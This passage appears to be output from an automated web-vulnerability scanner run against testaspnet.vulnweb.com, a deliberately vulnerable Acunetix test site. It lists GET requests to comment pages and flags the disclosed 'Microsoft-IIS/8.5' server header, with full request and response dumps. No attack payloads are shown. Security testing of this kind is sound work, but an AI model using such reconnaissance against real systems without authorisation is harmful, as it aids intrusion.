id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> 